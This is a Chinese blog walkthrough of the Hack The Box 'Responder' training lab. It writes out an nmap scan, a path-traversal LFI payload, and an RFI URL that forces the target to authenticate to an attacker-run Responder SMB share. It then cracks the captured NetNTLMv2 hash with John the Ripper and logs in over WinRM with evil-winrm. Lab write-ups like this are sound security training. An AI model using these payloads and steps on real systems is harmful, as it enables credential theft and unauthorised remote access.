Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder

最新推荐文章于 2023-11-30 06:15:11 发布
最新推荐文章于 2023-11-30 06:15:11 发布
阅读量1.1k 收藏 6
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42445757/article/details/124281639
版权

涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器)
在这里插入图片描述

先看一下旁边的Walkthough,看看本靶场的要求
本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程序来捕获 NetNTLMv2 哈希,然后使用一个称为 john the ripper 的实用程序来测试数百万个潜在密码,看看它们是否与用于创建哈希的密码匹配。我们还将深入研究 NTLM 身份验证的工作过程以及响应程序实用程序如何捕获挑战。
TASK 1,开放了多少TCP端口?答案是3。
在这里插入图片描述

使用nmap扫描,-p-:所有端口,-min-rate:最低速率
nmap -v -p- -min-rate 3000 -sV -sC 10.129.203.29,扫出了80,5980和7680端口。
在这里插入图片描述

TASK 2,使用 IP 地址访问 Web 服务时,我们被重定向到的域是什么?unika.htb
在这里插入图片描述

我们直接访问ip会显示无法建立到unika.htb服务器的链接
在这里插入图片描述

我们使用echo命令绑定一下host(tee命令用于读取标准输入的数据,将内容输出成文件,-a/–append:附加到既有文件的后面,而非覆盖它)
echo “10.129.203.29 unika.htb” | sudo tee -a /etc/hosts
在这里插入图片描述

TASK 3,服务器上哪种脚本语言被用来生成网页?php
在这里插入图片描述

TASK 4,用于加载不同语言版本网页的 URL 参数的名称是什么?page
在这里插入图片描述

当我们将语言改为FR的时候,URL参数为page=french.html
在这里插入图片描述

TASK 5,哪个page参数的值可能存在本地文件包含(LFI),这里很明显本地文件包含是…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts
在这里插入图片描述

目前已知的参数只有page,用page测一下是否存在文件包含,这里就爆出了/etc/hosts的内容
在这里插入图片描述

TASK 6,远程文件包含(RFI)是哪个?答案是//10.10.14.6/somefile,远程包含目标IP下的文件。
在这里插入图片描述

TASK 7,NTLM是什么?NTLM(New Technology Lan Manager),NTLM是一种基于挑战(challenge)/响应(response)消息交互模式的认证过程。
在这里插入图片描述

TASK 8,使用Responder去指定网络接口。kali自带的responder,–help查看使用,这里可以看到-I是指定网络接口。
在这里插入图片描述
在这里插入图片描述
使用responder创建一个恶意的SMB服务器,当目标机器尝试对该服务器执行 NTLM 身份验证时,响应程序会向服务器发送回一个质询,以使用用户密码进行加密。当服务器响应时,Responder 将使用质询和加密响应来生成 NetNTLMv2。虽然我们无法逆向 NetNTLMv2,但我们可以尝试许多不同的常用密码,看看是否有任何生成相同的质询响应,如果找到,我们就知道那是密码(可以使用Jhon the Ripper工具)。
sudo responder -I tun0
在这里插入图片描述

浏览器通过page远程包含,访问我们tun0网卡,
http://unika.htb/index.php?page=//10.10.16.133/somefile,捕获到对应的hash值
在这里插入图片描述

TASK 9,有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看其中是否有任何一个生成相同的响应。 一种这样的工具通常被称为“john”,但全名是什么?John the Ripper
在这里插入图片描述

TASK 10,administrator的密码是什么?
在这里插入图片描述

使用John the Ripper破解
首先将刚才的Hash存到文件中,echo “hash” > hash.txt
破解john -w=/usr/share/wordlists/rockyou.txt hash.txt(-w:使用字典)
得到administrator密码badminton
在这里插入图片描述

TASK 11,我们将使用 Windows 服务使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?5985端口。
在这里插入图片描述

再来看一下我们nmap扫描到的端口
在这里插入图片描述

最后来获取flag,我们将连接到目标上的 WinRM 服务并尝试获取会话(默认情况下Linux没有安装PowerShell)。
-i:指定ip,-u:指定用户名,-p:指定密码
evil-winrm -i 10.129.203.29 -u administrator -p badminton
进入shell
在这里插入图片描述

在C:\Users\mike\Desktop下找到了flag,用type命令打印出来。
在这里插入图片描述

D4vid
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
soloproject-tier1-website-template:Chingu Solo Project-Tier 1-网站模板
05-25
Chingu Solo Project-Tier 1-网站模板 概述 该项目通过克隆HTML / CSS / JS中的“征服”网站模板而没有Bootstrap,jQuery或其他库(例如Materialize),为您提供了制作Modern Looking Web应用程序的绝妙实践! 当您...
soloproject-tier1-chingu-trivia:Chingu Solo Project-Tier 1-Chingu Trivia
05-25
Chingu Solo Project-Tier 1-Chingu Trivia概述这个项目是开发干净现代的网页的绝好机会。 Trivia应用程序将跨层完成,而每一层都将复杂性提高到新的水平。 您目前在第1层存储库中。 您将负责对HTML , CSS和...
HackTheBox靶场系列(一)之HackTheBox靶场简介
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3163
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Hack the box -- Responder靶机
m0_64815693的博客
12-15 2312
Hack the back 靶场 Responder
responder简单用法
qq_44881113的博客
09-08 1379
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域网模拟各种服务器的内网渗透神器 其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
Responder
09-20 430
操作系统:Kali Linux 工具:responder,john,evil-winrm PS:输入以下命令解决靶场环境无法打开问题
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4242
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
Tier-1-Coding-in-JPEG2000-master.zip
11-22
这个名为“Tier-1-Coding-in-JPEG2000-master.zip”的压缩包文件显然是针对JPEG2000编码的MATLAB实现,对于学习和理解JPEG2000编码技术具有重要的价值。 JPEG2000的核心是基于离散小波变换(DWT)的编码方法,取代...
Data Center Site Infrastructure Tier Standard- Topology中文.pdf
04-14
该文档为Data Center Site Infrastructure Tier Standard- Topology的中文翻译,能够为数据中心设计者提供辅助和参考,适用于数据中心的建设者、设计者、运营者
Tier-1-Load.py.zip_damage_damage plastic_elasto-plastic_plastic
09-24
在IT行业中,尤其是在材料科学和工程计算领域,"Tier-1-Load.py.zip_damage_damage plastic_elasto-plastic_plastic"这个标题所暗示的是一个关于材料损伤和塑性行为的Python脚本。这个脚本可能被用于模拟和分析材料...
灰帽黑客(第五版):实验10-1 使用Responder获取口令
lmpwang的博客
08-25 236
宿主机Kali:192.168.43.209虚拟机VirtualBox:网络:桥接网络,使虚拟机和宿主机保持在一个网段系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!Responder
内网渗透之Responder演练(下)
qq_53058639的博客
08-21 108
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
Hack The Box 系列域渗透之靶机Multimaster
二狗的博客
02-03 1321
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机。
渗透测试靶场练习——Responder
Aibne_的博客
06-13 284
渗透测试靶场练习——Responder
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
weixin_42109829的博客
09-08 4717
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1980
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
废物的靶场日记 hackthebox-Backdoor
m0_53302733的博客
03-27 1372
废物的靶场日记 hackthebox-Backdoor 今天做的第三台了 把easy难度的active机器先清了 靶机IP 10.10.11.125 前渗透 sudo nmap -sS -sC -p- --min-rate=5000 10.10.11.125 这个nmap怎么变了呢 那必然是一开始![请添加图片描述](https://img-blog.csdnimg.cn/154f72a4e7bd40e387e66b03444bf9c4.png?x-oss-process=image/watermar
HackTheBox:Pandora靶场
qq_45855975的博客
05-22 1111
HackTheBox:Pandora靶场 这个靶场是一台linux机器,上边搭载了两个cms,其中涉及到对信息搜集、ssh证书登录、suid提权、sql注入等知识的考验 信息搜集 nmap走一遍什么也没
黑客讲述渗透Hacking Team全过程(详细解说)
weixin_30482181的博客
04-24 1185
近期,黑客Phineas Fisher在pastebin.com上讲述了入侵Hacking Team的过程,以下为其讲述的原文情况,文中附带有相关文档、工具及网站的链接,请在安全环境下进行打开,并合理合法使用。作者部分思想较为激进,也请以辩证的观点看待之。 1、序言 在这里,可能你会注意到相比于前面的一个版本,这个版本的内容及语言有了一些变化,因为这将是最后一个版本了[1]。对于黑客技术,...
汽车tier1和主机厂的区别
06-09
汽车 Tier1 企业和主机厂在汽车供应链中扮演着不同的角色。Tier1 企业通常是供应链中的一级供应商,他们向主机厂提供汽车零部件和系统。Tier1 企业通常专注于某个特定领域,例如发动机、底盘、电子系统等,他们负责设计、开发、制造和交付这些零部件和系统给主机厂。 而主机厂则是汽车生产的核心,他们负责整个汽车的设计、制造和销售。他们从 Tier1 企业购买各种零部件和系统,然后将它们集成到汽车中,并最终将汽车销售给消费者。主机厂也会进行自主研发,例如开发新的汽车平台、电动车技术等。 因此,Tier1 企业和主机厂的职责和角色不同,但他们之间密切合作,共同构建汽车供应链。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值